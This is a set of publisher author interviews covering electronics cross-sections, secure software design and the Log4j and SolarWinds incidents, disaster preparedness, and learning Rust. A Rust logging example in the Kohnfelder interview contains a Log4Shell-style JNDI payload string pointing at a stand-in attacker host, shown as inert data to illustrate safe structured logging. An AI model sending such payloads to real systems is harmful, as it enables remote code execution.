Eric Schlaepfer: I grew up fascinated by cross sections and cutaways. I’m sure that influenced this book, but it’s not exactly what inspired me. It was a broken piece of equipment, and the problem was one of the electrical components (a tantalum capacitor similar to the one on page 40). I sanded it in half to see if I could figure out how it failed, tweeted a photo, and folks really enjoyed it. So I started cutting other parts in half, and that led to the book.

Windell Oskay: I’ve always been interested in how things are made, in addition to how they work and what’s inside them. One of the really remarkable things about physically cutting things is that you get to see so many features that are maybe incidental to the function of the device, but are signatures of the processes that went into making it. Each part tells a story. And, often, we’re not even saying anything about them. Those little stories are left for the readers to discover.


NSP: The two of you have professionally intersected over the years in Silicon Valley, and have worked together on some design projects for Evil Mad Scientist Laboratories. But who roped whom into this book idea? What compelled you to collaborate at such a level?

ES: We’ve worked together on a number of other projects, such as the Three Fives discrete 555 timer kit, as well as the world’s largest 6502 microprocessor—the MOnSter 6502. Windell had seen my photos on Twitter, and we started talking about how to turn it into a book. I don’t remember all the details but it was a very natural thing.

WO: We’ve had a number of fruitful collaborations. In addition to those that Eric mentioned, we also designed an educational project, “Uncovering the Silicon,” that we presented at Maker Faire (along with Ken Shirriff, our technical reviewer for Open Circuits, and John McMaster, who prepared some subjects for photography). In that project, we placed very simple integrated circuits under a microscope and showed how they worked by tracing their individual parts. There’s a sense in which our book is a successor to that project—we’re letting people look at things up close, and then talking through how they work. But, I think that there was actually a moment when I roped Eric into the book idea after seeing his early cross-section photos.


NSP: What was the most challenging aspect of putting this book together?

ES: There were many challenges. For me, the most difficult challenge was preparing the samples—it took a really long time to prepare each one, taking care to create a polished section with no scratches or blemishes, and being careful to remove every speck of dust.

WO: At one point we realized that we would have to cull the weakest subjects from our draft. We ended up deleting about a dozen—some quite interesting and beautiful—along with their descriptive text. The book is stronger as a whole because we did so, but it really stung at the time. Fine-tuning our text was also difficult in places. For a number of subjects, we only had a few sentences in which to flesh out subtle concepts clearly, to an audience composed of both laypeople and engineers.


NSP: How did you divide up all of the labor that the book entailed? I mean, you had to find hundreds of tiny electronic components, carefully cut them in half, photograph them, write the accompanying text for each page—the list goes on and on!

ES: Windell took on the photography and some of the sample preparation, introducing me to some more professional tools that I hadn’t used before. We spent time searching the local electronics surplus store for potential subjects, and I made a lot of exploratory cuts to see if a particular component would be good enough for the book. I’d say the writing was a 50/50 split—we spent so much time writing and editing over video chat that I wouldn’t be able to point to any sentence and definitively say, “I wrote this.”

WO: In addition to the bulk of the cutting and sample preparation, Eric also drew the rough drafts of all of the illustrations and wrote the initial drafts of some of the most challenging subjects to describe. I took the photographs, fine-tuned the illustrations, and designed the initial page layout so that we could understand how much text could be paired with each photographic subject. And as Eric said, we worked together closely through all of the writing and editorial choices.


NSP: Eric—what was the hardest thing to cross-section, and how did you eventually make it work?

ES: The most challenging was the cathode ray tube (page 186). Windell had the idea to cut it on the slow-speed saw so we could remove the electron gun. I sectioned the glass envelope and the electron gun separately—each of those took several hours to wet sand. The parts were simply too fragile to section any other way. Cleaning the sectioned electron gun was difficult because of the small magnet inside, which vacuumed up the debris created during sanding.


NSP: Windell—unlike a cross-section illustration, capturing everything inside an object with a single photograph in a single frame had to be difficult at times. Can you give us some examples where you had to get creative to get the shot?

WO: One of the basic limitations that you can run into with macro photography is the limited depth of field—only a very narrow slice of the view is in focus at any given time. We used focus-stacking software to digitally combine pictures taken at different camera positions, stitching them together like a panorama where the entire subject is sharp and in focus. The circuit-board photograph on the front cover of the book was taken this way. Other times, the subject itself can just be plain hard to photograph.

For some of the LEDs, like the surface-mount LED on page 90, we took photos at different exposure levels and composited them (in a basic HDR—high dynamic range—process) so that you can see detail even in the brightly lit LED. For the color sensor on page 81, the photos came out drab until we added an additional light source at just the right position and brightness so that you could see the additional reflection.


NSP: How did you decide what samples and images ultimately made it into the book?

ES: During endless hours of video chat we discussed every potential sample and made a highly detailed spreadsheet. We’re both very organized.

WO: Some part of it was determined by which things we could get our hands on—there are probably 50 other things in the spreadsheet that we might have included if we had an example to disassemble. We did skip a number of potential subjects that were too similar to others, too difficult to section, too difficult to photograph, or that were less likely to be of general interest.


NSP: Anyone who’s into photography knows that what’s pleasing to the eye is not always pleasing to the lens. Were there any samples that you successfully cross-sectioned but just could not get a good photo of—things you left on the cutting-room floor, as it were?

WO: Yes, there were quite a few actually, including some that we put a lot of time into preparing. A good example is a reed relay, where we just couldn’t get a photo that clearly showed the features that we wanted to highlight.


NSP: Given that you both have backgrounds in hardware engineering—and professional tinkering in general—did you know in advance which electronic components would look cool from a cross-cutting perspective, or was there a lot of trial and error? Any surprises along the way, good or bad?

ES: I’ve seen a few component cross sections created for failure-analysis purposes, so I knew about certain components that would look good, but there were definitely a few surprises. We thought an RGB LED would look cool, but after cutting into one, it just didn’t really seem interesting. We took apart a boring-looking gray electronics module that turned out to be a fabulously complex jewel—the isolation amplifier (page 266).

WO: One of my favorites that took some experimentation was the multilayer ceramic capacitor (page 36). There’s never been any mystery about what is in one—stacked layers of metal electrodes—but it took us a lot of experimentation and cutting into different capacitors to find one where you could literally see and count the individual layers. There were definitely real surprises along the way. The way that the rocker DIP switch (page 110) works inside is just stunningly elegant.


NSP: You include a “Retro Tech” section in the book for your vintage finds, like Nixie tubes, a mercury tilt switch, and even a magnetic tape head. From a purely aesthetic standpoint, which era wins (Old vs. Modern) as far as microscale interior design goes?

ES: They both fascinate me. Vintage components seem warm and natural to me, being made of less processed materials like brass, rubber, mica, and glass. Modern parts have a sort of cold Cartesian precision and a microscopic intricacy.

WO: Modern electronics has so much more to offer in interior design—there’s just so much more inside. But if we were talking about exterior design, I’d pick the vintage. I love all the brass and Bakelite.


NSP: Windell, your company’s motto is “Making the World a Better Place, One Evil Mad Scientist at a Time.” If you had to come up with a similar motto for your book, what would it be? I’ll go first: “Making the garage a messier place, one experiment at a time!” . . . I guess what I’m getting at is, what effect do you hope your work in this book has on people? Eric, same question for you.

WO: If the book needed a motto, other than our existing subtitle, I’d pick “Showing you the Hidden Wonders Inside Electronics.” I hope that it inspires people to open up their electronics and look inside. To look at the parts for the little clues about how they’re made, what they’re for, and how they work. To appreciate elegant design, where they weren’t looking for it before.

ES: I want to inflame curiosity. Earlier today my very young nephew was totally absorbed in a copy of the book, asking his mother afterwards if they had any circuits he could play with. The world is a better place with curious people living in it.


Redesigning Security with Living Legend Loren Kohnfelder

This month, we continue our Author Spotlight series with an in-depth interview of Loren Kohnfelder—a true icon in the security realm, as well as the author of Designing Secure Software. In the following Q&A, we talk with him about the everlasting usefulness of threat modeling, why APIs are plagued by security issues, the unsolved mysteries of the SolarWinds hack, and what the recent Log4j exploit teaches us about the importance of prioritizing security design reviews.


Loren Kohnfelder is a highly influential veteran of the security industry, with over 20 years of experience working for companies such as Google and Microsoft—where he program-managed the .NET Framework. At Google, he was a founding member of the Privacy team, performing numerous security design reviews of large-scale commercial platforms and systems. Now retired and based in Hawaii, Loren expands upon his extraordinary contributions to security in his new book, detailing the concepts behind his personal perspective on technology (which can also be found on his blog), timeless insights on building software that's secure by design, and real-world guidance for non-security-experts.

No Starch Press: Aloha, Loren! We can’t talk about your new book without acknowledging the colossal impact your security work has had over the past five decades. For one, in your 1978 MIT thesis you invented Public Key Infrastructure (PKI), introducing the concepts of certificates, CRLs, and the model of trust underlying the entire freaking internet. You were also part of the Microsoft team that first applied threat modeling at scale, you co-developed the STRIDE threat-ID model (Spoofing identity, Tampering with data, Repudiation threats, Information disclosure, Denial of service, and Elevation of privilege), and you helped bake security design reviews into the development process at Google—all of which are key growth spurts in the evolution of software security.

Speaking of STRIDE, there are a lot of software professionals using the methodology who weren’t even born when you and Praerit Garg first invented it in the late ’90s. Pretty remarkable that something started in the era of desktop computing remains just as relevant in the age of cloud, mobile, and the web. Why do you think it continues to be so effective and seemingly immune from obsolescence?

Loren Kohnfelder: Aloha, Jen! STRIDE turned 23 this month, and the software landscape today is unrecognizable by comparison. Yet, the fundamentals of threat modeling are just as relevant as ever. I think that STRIDE's enduring value is due to its simplicity as an expression of very fundamental threats.

Since those early days, we've gained pervasive internet connectivity, exponential growth in compute power and storage, and cloud computing, and software itself has become vastly more complex. All of these changes have grown the attack surface—and our greater reliance on digital systems, along with the massive amounts of data in the world, only increases the motivation for attackers. For all of these reasons, threat modeling is more important than ever for gaining a proactive view of the threat landscape and the best chance of designing, developing, and deploying a secure system.

It's important to note as well that STRIDE never purported to cover every threat software needs to be concerned with, especially now that we have IoT devices, robots, and self-driving cars that act directly in the world, introducing new potential forms of harm. For applications beyond traditional information processing, it's critical to consider other possible threats to systems that interact with people and machines in powerful ways.


NSP: It’s normal for management to tap external security experts to ensure that tech products and systems are safe to deploy—often via a security review prior to release. An essential premise of your book rejects this standard in favor of moving security to the left. What’s wrong with the status quo, why is security by design better for the bottom line, and… are you ever worried that an angry mob of out-of-work security consultants might show up at your door?

LK: No worries at all that software security will be totally solved anytime soon, so there will continue to be strong demand for good minds defending our systems. This is the most challenging topic covered in the book, and my research included discussions with friends doing just that kind of work.

Rather than “reject,” I would say that I'm recommending moving left "in addition to." Here's what I wrote in the book (p. 235) on this: "Specialist consultants should supplement solid in-house security understanding and well-grounded practice, rather than being called in to carry the security burden alone." I don't think that any security consultant has ever concluded a review by saying, "I think I found the last vulnerability in the system!" So let's try to give them more secure software in the first place to review. The two approaches needn't be an either-or decision: the challenge is finding a good balance combining both approaches.

Honestly, I think the experts will appreciate reviewing well-designed systems without low-hanging fruit, so they can really demonstrate their chops by finding the more subtle flaws. In addition, solid design and review documents will provide a very useful map guiding their investigations compared to confronting a mass of code.


NSP: A point you make in the book is that “software security is at once a logical practice and an art form, one based on intuitive decision making.” This represents a paradigm shift for most developers, who tend to focus on “typical” use cases during the design phase—in other words, they presume the end product will be used as intended. You propose that they should actually be doing the opposite, that having a “security mindset” means looking at software and systems the way an attacker would. For those daunted by the prospect, can you explain what this means in practice?

LK: You have put your finger on the specific stretch that I'm inviting developers to make, and while the security mindset is a new perspective, I would say that it's more subtle than difficult. Having a security mindset involves seeing how unexpected actions might have surprising outcomes, such as realizing that a paperclip can be bent into a lockpick to open a tumbler lock. Another example from the book is a softball team deviously named "No Game Scheduled"—when the schedule was printed, other teams assumed the name meant that they had a bye, and therefore didn't show, forfeiting the game.

Again, this is a different viewpoint worth considering in addition to, not instead of, the usual. To help people new to the topic, the book is filled with all kinds of stories and basic examples that illustrate how attackers exploit obscure bugs. Malicious attacks on major systems regularly make the news, and we can decide to anticipate these eventualities throughout the development cycle, or not. It's worth adding that while security pros might be more facile at the security mindset, the software team members are the ones who know the code inside and out, so with a little practice they are better positioned for identifying these potential vulnerabilities.

NSP: Let’s talk about the bigger picture for a moment. We’re barely two years out from SolarWinds—one of the most effective cyber-espionage campaigns in history, where a routine software update launched an attack of epic proportions. If anything, it showed that threat actors know exactly how tech companies operate. Not to mention, the malicious code used in the attack was designed to be injected into the platform without arousing the suspicion of the development and build teams, which makes it all the more scary. If you could prescribe an industry-wide approach to preventing similar attacks in the future, what would it be?

LK: SolarWinds was a very sophisticated attack on a complex product, and the public information I've found doesn't provide a complete picture of exactly what happened. So my response here is based on a high-level take, not any specifics. First, I'd say that reliance on products like this, which are given broad administrative rights across large systems, puts a lot of high-value eggs in one basket.

I would love to see a detailed design document for the SolarWinds Orion product: did they anticipate potential threats (like what happened), and if so, what mitigations were built in? Publishing designs as a standard practice would give potential customers something substantial to evaluate, to see for themselves what risks a product's designers foresaw and how those risks are mitigated. And when this kind of breach occurs, the design serves to guide analysis of events so we can learn how to do better in the future.

NSP: The massive scope of the SolarWinds incident—affecting dozens of companies and federal agencies—was made possible by the use of compromised X.509 certificates and PKI, in that attackers managed to distribute SUNBURST malware using software updates with valid digital signatures. Back in your time at MIT, you became known for defining PKI; today there’s an implication that code signed by software publishers is trustworthy, but in light of SolarWinds this no longer appears to be a safe assumption. Is there a solution to this on the horizon?

LK: I don't think it's possible to "fix" that, because it boils down to trust in the signing party and their competence. For example, if we are signing a contract and a lawyer uses sleight-of-hand to substitute a fraudulent version, I can be deceived into providing a valid legal signature. I don't know exactly what happened at SolarWinds, but they are the ones ultimately responsible for their code-signing key. In hindsight, I wonder if they fully realized how attractive their product could be to a sophisticated threat actor, and if they took the necessary precautions against that—which would be considerable. (For the record, I was not involved in the creation of the X.509 specification.)

Generally speaking, code signing is problematic because if vulnerabilities are found later, the signature remains valid—even though the code is known to be unsafe and no longer trustworthy. Administrators must go beyond checking for valid signatures, confirming that the code is the latest available version before trusting it, and of course promptly installing future updates that fix critical issues.


NSP: On that note, the concept of “good enough security” is predicated on the belief that the threat landscape is somehow static in nature. One thing you really stress in the book is the importance of understanding the full range of potential threats to information systems—and that means accepting that there are adversaries out there whose capabilities are higher than the current standards software developers abide by. How can dev and ops teams work together to implement security measures that not only address what is known, but also deal with threats as they evolve over time, so they can stay a step ahead of persistent adversaries?

LK: Just as you say, broad and deep threat-awareness is important as a starting point, and then the really hard part is choosing mitigations and ensuring that they do the job intended. This is a subjective process, and if you really want to stay ahead, as you say, that usually means aggressively mitigating just about every threat that you can identify, so as not to be blindsided.

Excellent point about the dangers of treating the threat landscape as static, and this is also a strong argument for moving left—because the more mitigation you work into the design, the better. (Plus, as the environment evolves, it's very hard to go back to the design for a redo!)


NSP: It’s common knowledge that “all software has bugs,” and that a subset of those bugs will be exploitable—ergo, the challenge of secure coding essentially amounts to not introducing flaws that become exploitable vulnerabilities. Seems easy enough! But programmers are only human, and while many of them make the effort to build protection mechanisms that improve safety in, say, the features of APIs, what are some everyday programming pitfalls you see as the root causes of most security failings?

LK: While “all software has bugs” is generally accepted as true, too often I think the connection to vulnerabilities is under-recognized. Instead, it's easy to rationalize lower quality standards since the end product will have bugs anyway. Part III of the book covers many of these common pitfalls in a little over 100 pages, so I won't attempt to summarize all that here.

If your question about root causes goes deeper, asking why programming languages and APIs are so prone to security problems, then I would say it's often simply because the practice of software development goes back before there was much awareness of security. For example, the C language has been profoundly influential, and it's still widely used, but it also gave us arithmetic overflow and buffer overruns. The inventors surely knew about these potential flaws but had no way to imagine the 2022 digital ecosystem, and threats like ransomware. The same goes for APIs, which can fail to anticipate evolving threats and, once distributed, are very hard to fix later.

Another common cause in API design is failing to present a clean interface, in terms of trust relationships and security responsibilities. API providers naturally want to offer lots of features and options, yet this makes the interface complicated to use. Since the implementation behind the API is typically opaque to the caller, it's easy for a mistake to arise. So it's imperative for the API documentation to provide clear security commitments, or detail exactly what precautions callers must take and why. Log4j is a perfect example of this problem: surely most applications reasonably assumed it was safe to log untrusted inputs, but the JNDI feature—which they may not even have been aware of—offered attackers an attractive point of entry.


NSP: Since you brought it up, and it sort of ties together everything we’ve been discussing, let’s talk about that Apache Log4j zero-day vulnerability (which continues to make headlines). Here we have a Java-based logging library used by millions of applications, that has a critical flaw described as basically “trivial” to exploit. Why is this bug considered so incredibly severe? And, even though your book was released before the issue was discovered, are there any nuggets of wisdom in it that address this type of issue—or that could help software developers solve the problems that led to it?

LK: Log4j could be the poster child for the importance of security design reviews. Much has been written already by folks who have examined this extensively, but clearly allowing LDAP access via JNDI was a design flaw. Whether the designer(s) recognized the threat or not, mitigated insufficiently, or simply failed to understand the consequences, is hard to say without a design document (much less a review). Skipping secure design and review means missing the best opportunities to catch exactly this sort of vulnerability before it ever gets released in the first place.

This vulnerability is nearly a perfect storm because of a combination of factors: it allows remote code execution (RCE) attacks, the vulnerable code is very widely used by Java applications, and as a logging utility it's often exposed to the attack surface. That last point deserves elaboration: attackers often poke at internet-facing interfaces using malformed inputs in hopes of triggering a bug that might be a vulnerability; and developers want to monitor the use of these interfaces, so they log the untrusted input, creating a direct connection to the vulnerable code in Log4j. It so happens that the book includes an example design document for a simple logging system (Appendix A), and that API explicitly uses structured data (as JSON) rather than the escape-sequence strings that got Log4j into trouble.
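As a rough illustration of why structured logging is safer (a sketch of my own, not the book's Appendix A design; the function names here are hypothetical), consider serializing untrusted input as an escaped JSON field. The input remains inert data no matter what directives it contains:

```rust
// Escape a string so it can sit safely inside a JSON string value.
fn json_escape(s: &str) -> String {
    let mut out = String::new();
    for c in s.chars() {
        match c {
            '"' => out.push_str("\\\""),
            '\\' => out.push_str("\\\\"),
            '\n' => out.push_str("\\n"),
            c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
            c => out.push(c),
        }
    }
    out
}

// Render one log entry as structured JSON: the untrusted value is confined
// to a data field rather than interpolated into a free-form message that
// downstream tooling might interpret.
fn log_entry(event: &str, untrusted_input: &str) -> String {
    format!(
        "{{\"event\":\"{}\",\"input\":\"{}\"}}",
        json_escape(event),
        json_escape(untrusted_input)
    )
}

fn main() {
    // A lookup-style payload is recorded verbatim as data, never evaluated.
    println!("{}", log_entry("login_failed", "${jndi:ldap://attacker.example/a}"));
}
```

The point is not the escaping mechanics but the contract: the logging API accepts data fields, never a format string assembled from attacker-controlled text.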

Furthermore, threat modeling and secure software design should have informed all applications using Log4j of the risks involved in logging untrusted inputs. In the book's Afterword, I write about using software bills of materials (which would have identified which applications use Log4j), and the importance of promptly updating dependencies (in this case, the slow response to Log4j is why it's still in the news), just to name a few additional mitigations that'd help. (I posted about Log4j at more length last year when it first became public.)

NSP: Wow, Loren—maybe you should come out of retirement! At the very least, Designing Secure Software should be required reading for everyone in the field, and it’s clearly becoming more urgent with every passing day.

LK: Thanks for your kind words and this opportunity to reflect on current events. The book is my way of stepping out of retirement to share what I've learned in hopes of nudging the industry in some good new directions. I certainly recognize that investing security effort from the design stage runs counter to a lot of prevailing practice, but I've seen it practiced to good effect, and now there's a manual available if anyone wants to try the methodology.

I think that our discussion nicely shows the value of moving beyond reactive security, moving left to be more proactive. The book offers lots of actionable ideas, and it's written for a broad software audience so we can get more developers as well as management, interface designers, and other stakeholders all involved. No doubt security lapses will continue to occur—but when they do, we need more transparency to fully understand exactly what happened and how best to respond, and then to take those learnings and institute the changes necessary to improve in the future.


The End Is (Not) Nigh: Disaster Prepping with Michal Zalewski

For our first Author Spotlight interview of 2022, we have illustrious guest Michal Zalewski—world-class security researcher and author of the newly released Practical Doomsday: A User’s Guide to the End of the World. In the following Q&A, we talk with him about taking disaster preparedness back from the fringe, what he's learned from living through numerous calamities, the reason hackers have the edge over doomsday preppers in any real emergency, and why he’s got a solid backup plan “if this whole computer thing turns out to be a passing fad.”


Michal Zalewski (aka lcamtuf) has been the VP of Security & Privacy Engineering at Snap Inc. since 2018, following an 11-year stint at Google, where he built the product security program and helped set up a seminal bug bounty initiative. Originally hailing from Poland, he kick-started his career with frequent BugTraq posts in the ’90s, and went on to identify and publish research on hundreds of notable security flaws in the browsers and software powering our modern internet. In addition to his influence on the tech industry, Zalewski's known as the developer of the American Fuzzy Lop open-source fuzzer and other tools. He's also the author of two classic security books via No Starch Press, The Tangled Web (2011) and Silence on the Wire (2005), and is a recipient of the prestigious Lifetime Achievement Pwnie Award.

NSP: Gratulacje on your new book, Michal! Suffice it to say, a practical prep guide for doomsday scenarios could not be more timely (...all things considered). You even joke on Twitter that the past few years were an elaborate viral marketing campaign for the book’s release. But in fact, you’ve been writing on this subject since at least 2015. What first lured you into the disaster-preparedness genre?

Michal Zalewski: I keep asking myself the same question! For one, I simply grew up at an interesting time and in an interesting place: in a failed Soviet satellite state going through a period of profound political and economic strife. As a child, I didn’t think of it much, but as an adult, I look at my early years with a degree of terror and awe.

I also have this geeky curiosity about how complex systems work and how they might fail—and to be frank, I can’t quite grasp why we look at this problem so differently in the physical world versus the digital realm. After all, it’s normal to back up our files or use antivirus software; why is it wacky to buy fire extinguishers for one’s home or store several gallons of water and some canned food?

In my mind, risk modeling and common-sense preparations shouldn’t be a political issue and shouldn’t be the domain of people who are convinced that the end is nigh. If anything, having a backup plan is a wonderful way to dispel some of the worries and anxieties of everyday life.

NSP: Your personal bio illustrates one of the key points in the book—that disasters are not rare. In addition to growing up in Poland in the '80s, the book also brings up the experience of living through 9/11, the dot-com crash, and the housing crisis of 2008. Would you explain that larger theme within the context of your own trials and tribulations?

MZ: Oh, I don’t want to oversell my life story! My experiences are shared by tens of millions of people around the globe. Countless others have lived through much worse—famine, devastating natural disasters, wars.

I’m going to say one thing, though. Living through a sufficient number of calamities reveals a simple truth: that every generation gets to experience their own “winter of the century,” “recession of the century,” “pandemic of the century,” and so on. And every time, such events catch them off guard.

In most cases, it’s not a matter of life and death; most people make it through recessions, wildfires, and floods. But having a robust plan can make the situation much less stressful, and can make the recovery more certain and more swift.

NSP: Most people picture doomsday preppers as ex-military survivalist-types—not a self-described “city-raised computer nerd.” How has your hacker background informed the emergency-preparedness thought process you’re teaching readers in the book?

MZ: If there’s one obvious difference, it’s that in the physical realm, life-threatening incidents are fairly rare. In the world of computing, on the other hand, networks and applications are under constant attack. When you work in this domain, I think you start to appreciate the saying attributed to Mike Tyson: “everyone has a plan until they get punched in the mouth”—that is, theory seldom survives the clash with reality. At the end of the day, the surest way to get through an emergency is to be adaptable and resilient, not to have an impressive stockpile of guns and bushcraft tools.

Another principle I picked up from the world of information security is that there is no limit to how much time, effort, and money you can spend in the pursuit of perfection—but perfection is not necessarily a useful goal. A good preparedness strategy needs to zero in on problems that are important, plausible, and can be addressed in a cost-effective way, without jeopardizing your quality of life should the apocalypse not come.

NSP: As a teenager, you became active in Europe’s fledgling infosec community, which led to consulting projects, pentesting gigs and, eventually, a remarkable career in the industry. Based on your own success, what do you think it takes to truly succeed in the infosec field and/or what’s your best career advice for aspiring security researchers?

MZ: I try to be careful with career advice—sometimes, people are successful despite their habits, not because of them. That said, I certainly found it helpful to always approach security in a bottom-up fashion. If you make the effort to understand how the underlying technologies really work, their failure modes become fairly self-evident too.

My best advice for aspiring professionals is different, though: perhaps the most underrated skill in tech is solid writing. That’s because technical prowess is not sufficient to succeed—you need to get others on board. I have a short Twitter thread with a handful of tips here.

NSP: In addition to your street cred in the security world, you’re credited with (inadvertently) helping hackerdom in another realm entirely—Hollywood. The Matrix Reloaded is lauded as the first major motion picture to accurately portray a hack. More specifically, your hack. For those who haven’t seen it, Trinity uses an Nmap port scan, followed by an SSH exploit to break into a power company and disable the city’s electric grid. In 2001, you discovered the SSH bug being depicted on screen. Can you tell us anything about your vulnerability report being in one of the movie’s most pivotal scenes?

MZ: I wish I had a cool story to tell! I was surprised (and flattered) to see my bug on the big screen. My other cinematic claim to fame is having my fuzzer—American Fuzzy Lop—surface in the TV series Mr. Robot.

Of course, my screen credits pale in comparison with the track record of the aforementioned Nmap tool. The network scanner makes an appearance in at least a dozen films and TV series, reportedly including at least one porn flick.

NSP: In an example of life imitating art, the intelligence community has recently sounded the alarm over an “unprecedented” uptick in hackers targeting electric grids. Maybe if the fictional power company in The Matrix Reloaded had someone like you working for them, Trinity’s blackout-inducing exploit would have failed—which raises the question: do you think white-hat hackers could be the answer to the risk that APTs pose to critical infrastructure? Is it as simple as utility providers adopting bug-bounty programs, such as the one your team launched at Google a decade ago?

MZ: Bug bounties are a cherry on top for a mature security program: they are a last-resort mechanism to catch a fraction of the mistakes that slip past your internal defenses. But if you’re routinely letting vulnerabilities ship to production and then hoping that talented strangers will catch them all, you’re playing a very dangerous game.

A comprehensive security program starts with minimizing the risk of such mistakes in the first place: building automation that makes it easy to do the right thing and difficult for humans to mess up. The second layer of defense consists of internal processes for vetting the design and implementation of your systems, and for penetration-testing or fuzzing the products before they go out the door.

Still, the problem faced by most utilities isn’t related to any of this: it’s that we have a fairly small pool of infosec talent and that companies are fiercely competing for that talent. The Wyoming Rural Electric Association doesn’t have it easy when even the most junior security engineer can land an interview with Amazon, Goldman Sachs, or SpaceX.

NSP: From your early years posting software vulnerabilities on BugTraq, to your research exposing the flawed security models of web browsers, to helping Google build its massive product security program, you've become known as one of the most influential people in infosec. Over the same decades, the internet has gone from a place of dial-up connections and friendly message-boards to a global network that governs nearly every aspect of digital society. Given your unique vantage point in this regard, what do you think is the most pressing challenge in the industry today?

MZ: I'm not an infosec malcontent—I think our industry has made impressive progress when it comes to reasoning about and reducing the risk of most types of security flaws. But as you note, the stakes are getting higher too: nowadays, almost everything is connected to the internet, and even the humble thermostat on your wall might be running more than ten million lines of code. This makes absolute security a rather challenging goal.

In light of this, the two keywords that come to mind are "compartmentalization" and "containment." You have to plan for unavoidable mishaps and must have a way to prevent them from turning into disasters. For enterprises, this may involve dividing systems into smaller, well-understood blocks that can be cordoned off and monitored for anomalies with ease. The technologies and the architecture paradigms that make this possible are still in their infancy, but I think they hold a lot of promise.

Of course, we can practice compartmentalization and containment in everyday life, too. Perhaps only so much of your life should depend on the security of a single email provider or a single bank.

NSP: Last question! One of the prepper commandments in your book is, simply, “Learn new skills.” Why is this important for building a comprehensive disaster-preparedness plan, and what are some useful secondary skills that you have developed outside of infosec?

MZ: The point I make in the book is that the accelerating pace of technological change means that fewer and fewer jobs are for life. You know, in the 1990s, opening a VHS rental place or a music store was a sound business plan, journalism was a revered and well-paying gig, and the photographic film industry was a behemoth that consumed about a third of the global silver supply. We are probably going to see similar shifts in the coming decades. In particular, I’m not at all convinced that software engineers are still going to be an elite profession in 20-30 years.

It’s hard to predict the future, but it’s possible to hedge our bets—say, by pursuing potentially marketable hobbies on the side. Even if nothing happens, such pursuits are still rewarding on their own. I enjoy woodworking and tinkering with electronics. I could probably turn these hobbies into gainful employment if this whole computer thing turns out to be a passing fad.

*Use coupon code SPOTLIGHT30 to get 30% off your order of Practical Doomsday through March 9, 2022.

Live Coder Jon Gjengset Gets into the Nitty-Gritty of Rust

Our always fascinating Author Spotlight series continues with Jon Gjengset – author of Rust for Rustaceans. In the following Q&A, we talk with him about what it means to be an intermediate programmer (and when, exactly, you become a Rustacean), how Rust “gives you the hangover first” for your code's own good, why getting over a language's learning curve sure beats reactive development, and how new users can help move the needle toward a better Rust.


A former PhD student in the Parallel and Distributed Operating Systems group at MIT CSAIL, Gjengset is a senior software engineer at Amazon Web Services (AWS), with a background in distributed systems research, web development, system security, and computer networks. At Amazon, his focus is on driving adoption of Rust internally, including building out internal infrastructure as well as interacting with the Rust ecosystem and community. Outside of the 9-to-5, he conducts live coding sessions on YouTube, is working on research related to a new database engine written in Rust, and shares his open-source projects on GitHub and Twitter.

No Starch Press: Congratulations on your new book! Everyone digs the title, Rust for Rustaceans – which is a tad more fitting than its original moniker, Intermediate Rust. I only bring this up because both names speak to who the book is for. Let’s talk about that. What does “intermediate” mean to you in terms of using Rust? Specifically, what gap does your book fill for those who may have finished The Rust Programming Language, and are now raring to become *real* Rustaceans?

Jon Gjengset: Thank you! Yeah, I’m pretty happy with the title we went with, because as you’re getting at, the term “intermediate” is not exactly well-defined. In my mind, intermediate encapsulates all of the material that you wouldn’t need to know or feel comfortable digging into as a beginner to the language, but not so advanced that you’ll rarely run into it when you get to writing Rust code in the wild. Or, to phrase it differently, intermediate to me is the union of all the stuff that engineers working with Rust in real situations would pick up and find continuously useful after they’ve read The Rust Programming Language.

I also want to stress that the book is specifically not titled "The Path to Becoming a Rustacean," or anything along those lines. It’s not as though you’re not a real Rustacean until you’ve read this book, or that the knowledge the book contains is something every Rustacean knows. Quite the contrary – in my mind, you are a Rustacean from just before the first time you ask yourself whether you might be one, and it’s at that point you should consider picking up this book, whenever that may be. And for most people, I would imagine that point comes somewhere around two thirds through The Rust Programming Language, assuming you’re trying to actually use the language on the side.

NSP: Rust has been voted “the most loved language” on Stack Overflow for six years running. That said, it's also gained a reputation for being harder to learn than other popular languages. What do you tell developers who are competent in, say, Python but hesitant to try Rust because of the perceived learning curve?

JG: Rust is, without a doubt, a more difficult language to learn compared to its various siblings and cousins, especially if you’re coming from a different language that’s not as strict as Rust is. That said, I think it’s not so much Rust that’s hard to learn as it is the principles that Rust forces you to apply to your code. If you’re writing code in Python, to use your example, there are a whole host of problems the language lets you get away with not thinking about – that is, until they come back to bite you later. Whether that comes in the form of bugs due to dynamic typing, concurrency issues that only crop up during heavy load, or performance issues due to lack of careful memory management, you’re doing reactive development. You build something that kind of works first, and then go round and round fixing issues as you discover them.

Rust is different because it forces you to be more proactive. An apt quote from RustConf this year was that Rust “gives you the hangover first” – as a developer you’re forced to make explicit decisions about your program’s runtime behavior, and you’re forced to ensure that fairly large classes of bugs do not exist in your program, all before the compiler will accept your source code as valid. And that’s something developers need to learn, along with the associated skill of debugging at compile time as opposed to at runtime, as they do in other languages.
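For instance, sharing a mutable counter across threads is one of those up-front decisions: the compiler rejects plain shared mutation outright and only accepts code that spells out the synchronization, roughly like this (a generic sketch of my own, not an example from the book):

```rust
use std::sync::{Arc, Mutex};
use std::thread;

// Increment a shared counter from several threads. Passing a plain `&mut usize`
// into the spawned closures would not compile: the borrow checker forbids
// multiple mutable references, so the compiler forces the Arc + Mutex below.
fn parallel_count(n_threads: usize, per_thread: usize) -> usize {
    let count = Arc::new(Mutex::new(0usize));
    let mut handles = Vec::new();
    for _ in 0..n_threads {
        let count = Arc::clone(&count);
        handles.push(thread::spawn(move || {
            for _ in 0..per_thread {
                // The lock guarantees exclusive access; the type system
                // guarantees the lock is taken before the data is touched.
                *count.lock().unwrap() += 1;
            }
        }));
    }
    for h in handles {
        h.join().unwrap();
    }
    let total = *count.lock().unwrap();
    total
}

fn main() {
    // The data race that would silently corrupt this count in C is a
    // compile-time error in Rust unless the synchronization is explicit.
    assert_eq!(parallel_count(4, 1000), 4000);
}
```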

It’s that change to the development process that causes much of (though not all of) Rust’s steeper learning curve. And it’s a very real and non-trivial lesson to learn. I also suspect it’ll be a hugely valuable lesson going forward, with the industry’s increased focus on guaranteed correctness through things like formal verification, which only pushes the developer experience further in this direction. Not to mention that the lessons you pick up often translate back into other languages. When I now write code in Java, for instance, I am much more cognizant of the correctness and performance implications of that code because Rust has, in a sense, taught me how to reason better about those aspects of code.

